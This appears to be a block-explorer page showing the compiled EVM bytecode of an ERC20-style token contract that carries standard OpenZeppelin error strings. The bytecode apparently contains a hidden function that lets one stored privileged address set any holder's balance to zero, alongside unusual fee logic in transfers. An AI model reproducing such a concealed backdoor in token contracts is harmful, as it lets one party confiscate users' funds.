0e0c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e0390611b1f565b60405180910390fd5b8181610e189190611b3f565b600560008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600080610f8a6064610f7c3273ffffffffffffffffffffffffffffffffffffffff168873ffffffffffffffffffffffffffffffffffffffff1614158015610ef05750600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168973ffffffffffffffffffffffffffffffffffffffff1614155b8015610f5d5750600060056000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054115b610f6957600354610f6d565b6009545b8761125390919063ffffffff16565b61126990919063ffffffff16565b610f949190611635565b9050600081111561110857600161101482600560008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461127f90919063ffffffff16565b61101e9190611b73565b600560008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555060008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516110ff919061146a565b60405180910390a35b60016111736000838661111b9190611b3f565b6111259190611635565b600560008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461127f90919063ffffffff16565b61117d9190611b73565b600560008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef6000848761121d9190611b3f565b6112279190611635565b604051611234919061146a565b60405180910390a3611247858585611295565b5050505050565b505050565b600081836112619190611b73565b905092915050565b600081836112779190611be4565b905092915050565b6000818361128d9190611635565b905092915050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b838110156112d45780820151818401526020810190506112b9565b60008484015250505050565b6000601f19601f8301169050919050565b60006112fc8261129a565b61130681856112a5565b93506113168185602086016112b6565b61131f816112e0565b840191505092915050565b6000602082019050818103600083015261134481846112f1565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600061137c82611351565b9050919050565b61138c81611371565b811461139757600080fd5b50565b6000813590506113a981611383565b92915050565b6000819050919050565b6113c2816113af565b81146113cd57600080fd5b50565b6000813590506113df816113b9565b92915050565b600080604083850312156113fc576113fb61134c565b5b600061140a8582860161139a565b925050602061141b858286016113d0565b9150509250929050565b60008115159050919050565b61143a81611425565b82525050565b60006020820190506114556000830184611431565b92915050565b611464816113af565b82525050565b600060208201905061147f600083018461145b565b92915050565b60008060006060848603121561149e5761149d61134c565b5b60006114ac8682870161139a565b93505060206114bd8682870161139a565b92505060406114ce868287016113d0565b9150509250925092565b600060ff82169050919050565b6114ee816114d8565b82525050565b600060208201905061150960008301846114e5565b92915050565b6000602082840312156115255761152461134c565b5b60006115338482850161139a565b91505092915050565b61154581611371565b82525050565b6000602082019050611560600083018461153c565b92915050565b6000806040838503121561157d5761157c61134c565b5b600061158b8582860161139a565b925050602061159c8582860161139a565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806115ed57607f821691505b602082108103611600576115ff6115a6565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000611640826113af565b915061164b836113af565b925082820190508082111561166357611662611606565b5b92915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b600061169f6020836112a5565b91506116aa82611669565b602082019050919050565b600060208201905081810360008301526116ce81611692565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006117316025836112a5565b915061173c826116d5565b604082019050919050565b6000602082019050818103600083015261176081611724565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006117c36026836112a5565b91506117ce82611767565b604082019050919050565b600060208201905081810360008301526117f2816117b6565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006118556024836112a5565b9150611860826117f9565b604082019050919050565b6000602082019050818103600083015261188481611848565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006118e76022836112a5565b91506118f28261188b565b604082019050919050565b60006020820190508181036000830152611916816118da565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000611953601d836112a5565b915061195e8261191d565b602082019050919050565b6000602082019050818103600083015261198281611946565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006119e56025836112a5565b91506119f082611989565b604082019050919050565b60006020820190508181036000830152611a14816119d8565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611a776023836112a5565b9150611a8282611a1b565b604082019050919050565b60006020820190508181036000830152611aa681611a6a565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611b096026836112a5565b9150611b1482611aad565b604082019050919050565b60006020820190508181036000830152611b3881611afc565b9050919050565b6000611b4a826113af565b9150611b55836113af565b9250828203905081811115611b6d57611b6c611606565b5b92915050565b6000611b7e826113af565b9150611b89836113af565b9250828202611b97816113af565b91508282048414831517611bae57611bad611606565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000611bef826113af565b9150611bfa836113af565b925082611c0a57611c09611bb5565b5b82820490509291505056fea26469706673582212205d2c77214c652dd71a68224475101fb096d94dcfdbf0a4e85edd88900526cd8764736f6c63430008130033
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106100f55760003560e01c8063715018a611610097578063a457c2d711610066578063a457c2d714610276578063a9059cbb146102a6578063dd62ed3e146102d6578063f2fde38b14610306576100f5565b8063715018a6146102145780638da5cb5b1461021e57806395d89b411461023c578063a26715051461025a576100f5565b806323b872dd116100d357806323b872dd14610166578063313ce5671461019657806339509351146101b457806370a08231146101e4576100f5565b806306fdde03146100fa578063095ea7b31461011857806318160ddd14610148575b600080fd5b610102610322565b60405161010f919061132a565b60405180910390f35b610132600480360381019061012d91906113e5565b6103b4565b60405161013f9190611440565b60405180910390f35b6101506103d7565b60405161015d919061146a565b60405180910390f35b610180600480360381019061017b9190611485565b6103e1565b60405161018d9190611440565b60405180910390f35b61019e610410565b6040516101ab91906114f4565b60405180910390f35b6101ce60048036038101906101c991906113e5565b610426565b6040516101db9190611440565b60405180910390f35b6101fe60048036038101906101f9919061150f565b61045d565b60405161020b919061146a565b60405180910390f35b61021c6104a6565b005b6102266105fe565b604051610233919061154b565b60405180910390f35b610244610628565b604051610251919061132a565b60405180910390f35b610274600480360381019061026f919061150f565b6106ba565b005b610290600480360381019061028b91906113e5565b610758565b60405161029d9190611440565b60405180910390f35b6102c060048036038101906102bb91906113e5565b6107cf565b6040516102cd9190611440565b60405180910390f35b6102f060048036038101906102eb9190611566565b6107f2565b6040516102fd919061146a565b60405180910390f35b610320600480360381019061031b919061150f565b610879565b005b606060088054610331906115d5565b80601f016020809104026020016040519081016040528092919081815260200182805461035d906115d5565b80156103aa5780601f1061037f576101008083540402835291602001916103aa565b820191906000526020600020905b81548152906001019060200180831161038d57829003601f168201915b5050505050905090565b6000806103bf610a3f565b90506103cc818585610a47565b600191505092915050565b6000600654905090565b6000806103ec610a3f565b90506103f9858285610c10565b610404858585610c9c565b60019150509392505050565b60008060149054906101000a900460ff16905090565b600080610431610a3f565b905061045281858561044385896107f2565b61044d9190611635565b610a47565b600191505092915050565b6000600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6104ae610a3f565b73ffffffffffffffffffffffffffffffffffffffff16600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461053d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610534906116b5565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff16600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a36000600a60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b6000600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060048054610637906115d5565b80601f0160208091040260200160405190810160405280929190818152602001828054610663906115d5565b80156106b05780601f10610685576101008083540402835291602001916106b0565b820191906000526020600020905b81548152906001019060200180831161069357829003601f168201915b5050505050905090565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1603610755576000600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b50565b600080610763610a3f565b9050600061077182866107f2565b9050838110156107b6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107ad90611747565b60405180910390fd5b6107c38286868403610a47565b60019250505092915050565b6000806107da610a3f565b90506107e7818585610c9c565b600191505092915050565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610881610a3f565b73ffffffffffffffffffffffffffffffffffffffff16600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610910576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610907906116b5565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff160361097f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610976906117d9565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a380600a60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610ab6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610aad9061186b565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610b25576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b1c906118fd565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610c03919061146a565b60405180910390a3505050565b6000610c1c84846107f2565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610c965781811015610c88576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c7f90611969565b60405180910390fd5b610c958484848403610a47565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610d0b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d02906119fb565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610d7a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d7190611a8d565b60405180910390fd5b610d8583838361124e565b6000600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610e0c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e0390611b1f565b60405180910390fd5b8181610e189190611b3f565b600560008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600080610f8a6064610f7c3273ffffffffffffffffffffffffffffffffffffffff168873ffffffffffffffffffffffffffffffffffffffff1614158015610ef05750600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168973ffffffffffffffffffffffffffffffffffffffff1614155b8015610f5d5750600060056000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054115b610f6957600354610f6d565b6009545b8761125390919063ffffffff16565b61126990919063ffffffff16565b610f949190611635565b9050600081111561110857600161101482600560008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461127f90919063ffffffff16565b61101e9190611b73565b600560008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555060008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516110ff919061146a565b60405180910390a35b60016111736000838661111b9190611b3f565b6111259190611635565b600560008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461127f90919063ffffffff16565b61117d9190611b73565b600560008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef6000848761121d9190611b3f565b6112279190611635565b604051611234919061146a565b60405180910390a3611247858585611295565b5050505050565b505050565b600081836112619190611b73565b905092915050565b600081836112779190611be4565b905092915050565b6000818361128d9190611635565b905092915050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b838110156112d45780820151818401526020810190506112b9565b60008484015250505050565b6000601f19601f8301169050919050565b60006112fc8261129a565b61130681856112a5565b93506113168185602086016112b6565b61131f816112e0565b840191505092915050565b6000602082019050818103600083015261134481846112f1565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600061137c82611351565b9050919050565b61138c81611371565b811461139757600080fd5b50565b6000813590506113a981611383565b92915050565b6000819050919050565b6113c2816113af565b81146113cd57600080fd5b50565b6000813590506113df816113b9565b92915050565b600080604083850312156113fc576113fb61134c565b5b600061140a8582860161139a565b925050602061141b858286016113d0565b9150509250929050565b60008115159050919050565b61143a81611425565b82525050565b60006020820190506114556000830184611431565b92915050565b611464816113af565b82525050565b600060208201905061147f600083018461145b565b92915050565b60008060006060848603121561149e5761149d61134c565b5b60006114ac8682870161139a565b93505060206114bd8682870161139a565b92505060406114ce868287016113d0565b9150509250925092565b600060ff82169050919050565b6114ee816114d8565b82525050565b600060208201905061150960008301846114e5565b92915050565b6000602082840312156115255761152461134c565b5b60006115338482850161139a565b91505092915050565b61154581611371565b82525050565b6000602082019050611560600083018461153c565b92915050565b6000806040838503121561157d5761157c61134c565b5b600061158b8582860161139a565b925050602061159c8582860161139a565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806115ed57607f821691505b602082108103611600576115ff6115a6565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000611640826113af565b915061164b836113af565b925082820190508082111561166357611662611606565b5b92915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b600061169f6020836112a5565b91506116aa82611669565b602082019050919050565b600060208201905081810360008301526116ce81611692565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006117316025836112a5565b915061173c826116d5565b604082019050919050565b6000602082019050818103600083015261176081611724565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006117c36026836112a5565b91506117ce82611767565b604082019050919050565b600060208201905081810360008301526117f2816117b6565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006118556024836112a5565b9150611860826117f9565b604082019050919050565b6000602082019050818103600083015261188481611848565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006118e76022836112a5565b91506118f28261188b565b604082019050919050565b60006020820190508181036000830152611916816118da565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000611953601d836112a5565b915061195e8261191d565b602082019050919050565b6000602082019050818103600083015261198281611946565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006119e56025836112a5565b91506119f082611989565b604082019050919050565b60006020820190508181036000830152611a14816119d8565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611a776023836112a5565b9150611a8282611a1b565b604082019050919050565b60006020820190508181036000830152611aa681611a6a565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611b096026836112a5565b9150611b1482611aad565b604082019050919050565b60006020820190508181036000830152611b3881611afc565b9050919050565b6000611b4a826113af565b9150611b55836113af565b9250828203905081811115611b6d57611b6c611606565b5b92915050565b6000611b7e826113af565b9150611b89836113af565b9250828202611b97816113af565b91508282048414831517611bae57611bad611606565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000611bef826113af565b9150611bfa836113af565b925082611c0a57611c09611bb5565b5b82820490509291505056fea26469706673582212205d2c77214c652dd71a68224475101fb096d94dcfdbf0a4e85edd88900526cd8764736f6c63430008130033
Loading...
Loading
Loading...
Loading
Multichain Portfolio | 30 Chains
Chain | Token | Portfolio % | Price | Amount | Value |
---|
Loading...
Loading
[ Download: CSV Export ]
A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.